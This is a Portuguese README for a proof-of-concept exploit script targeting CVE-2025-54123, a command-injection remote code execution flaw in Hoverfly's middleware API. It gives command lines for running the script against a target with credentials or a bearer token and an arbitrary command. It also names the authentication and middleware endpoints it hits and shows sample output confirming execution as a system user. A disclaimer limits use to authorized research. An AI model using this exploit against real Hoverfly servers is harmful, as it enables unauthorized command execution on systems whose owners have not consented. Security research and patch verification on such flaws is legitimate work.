
Prova de conceito em Python para CVE-2025-54123, demonstrando injeção de comando para RCE na API de middleware do Hoverfly com autenticação baseada em credenciais ou token.
Este repositório contém um script de prova de conceito (PoC) em Python para interagir com instâncias do Hoverfly afetadas pela CVE-2025-54123.
O script suporta:
Aviso
Este projeto destina-se exclusivamente a pesquisas de segurança autorizadas, testes e fins educacionais. Não o utilize contra sistemas sem permissão explícita.
Instale as dependências:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Argumento | Descrição |
|---|---|
--target | Domínio ou endereço IP alvo |
--port | Porta do serviço alvo |
-u | Nome de usuário do Hoverfly |
-p | Senha do Hoverfly |
--token | Token bearer existente |
--cmd | String de comando fornecida ao endpoint de middleware |
Quando as credenciais são fornecidas:
/api/token-auth
O script se comunica com:
/api/v2/hoverfly/middleware
usando uma requisição PUT autenticada.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Este repositório é fornecido apenas para fins educacionais, de segurança defensiva e testes autorizados. O autor não assume nenhuma responsabilidade por uso indevido, danos ou consequências legais decorrentes do uso deste software.